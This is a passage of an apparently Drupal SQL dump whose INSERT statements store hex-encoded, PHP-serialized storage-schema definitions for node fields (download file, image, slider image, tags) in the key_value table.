363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32373a226669656c645f646f776e6c6f61645f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a33313a226669656c645f646f776e6c6f61645f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a313a7b693a303b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a33343a226e6f64655f7265766973696f6e5f5f6669656c645f646f776e6c6f61645f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a36303a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f646f776e6c6f61645f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32373a226669656c645f646f776e6c6f61645f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a33313a226669656c645f646f776e6c6f61645f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a313a7b693a303b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32393a226669656c645f646f776e6c6f61645f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'node.field_schema_data.field_image', 0x613a323a7b733a31373a226e6f64655f5f6669656c645f696d616765223b613a353a7b733a31313a226465736372697074696f6e223b733a34303a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f696d6167652e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32313a226669656c645f696d6167655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a31353a226669656c645f696d6167655f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a31373a226669656c645f696d6167655f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a31373a226669656c645f696d6167655f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31383a226669656c645f696d6167655f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32313a226669656c645f696d6167655f7461726765745f6964223b613a313a7b693a303b733a32313a226669656c645f696d6167655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32313a226669656c645f696d6167655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32313a226669656c645f696d6167655f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a32363a226e6f64655f7265766973696f6e5f5f6669656c645f696d616765223b613a353a7b733a31313a226465736372697074696f6e223b733a35323a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f696d6167652e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32313a226669656c645f696d6167655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a31353a226669656c645f696d6167655f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a31373a226669656c645f696d6167655f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a31373a226669656c645f696d6167655f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31383a226669656c645f696d6167655f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32313a226669656c645f696d6167655f7461726765745f6964223b613a313a7b693a303b733a32313a226669656c645f696d6167655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32313a226669656c645f696d6167655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32313a226669656c645f696d6167655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_slider_img', 0x613a323a7b733a32323a226e6f64655f5f6669656c645f736c696465725f696d67223b613a353a7b733a31313a226465736372697074696f6e223b733a34353a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f736c696465725f696d672e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32303a226669656c645f736c696465725f696d675f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a32323a226669656c645f736c696465725f696d675f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a32323a226669656c645f736c696465725f696d675f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a32333a226669656c645f736c696465725f696d675f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a313a7b693a303b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a33313a226e6f64655f7265766973696f6e5f5f6669656c645f736c696465725f696d67223b613a353a7b733a31313a226465736372697074696f6e223b733a35373a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f736c696465725f696d672e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32303a226669656c645f736c696465725f696d675f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a32323a226669656c645f736c696465725f696d675f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a32323a226669656c645f736c696465725f696d675f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a32333a226669656c645f736c696465725f696d675f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a313a7b693a303b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32363a226669656c645f736c696465725f696d675f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_tags', 0x613a323a7b733a31363a226e6f64655f5f6669656c645f74616773223b613a343a7b733a31313a226465736372697074696f6e223b733a33393a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f746167732e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32303a226669656c645f746167735f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32303a226669656c645f746167735f7461726765745f6964223b613a313a7b693a303b733a32303a226669656c645f746167735f7461726765745f6964223b7d7d7d733a32353a226e6f64655f7265766973696f6e5f5f6669656c645f74616773223b613a343a7b733a31313a226465736372697074696f6e223b733a35313a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f746167732e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6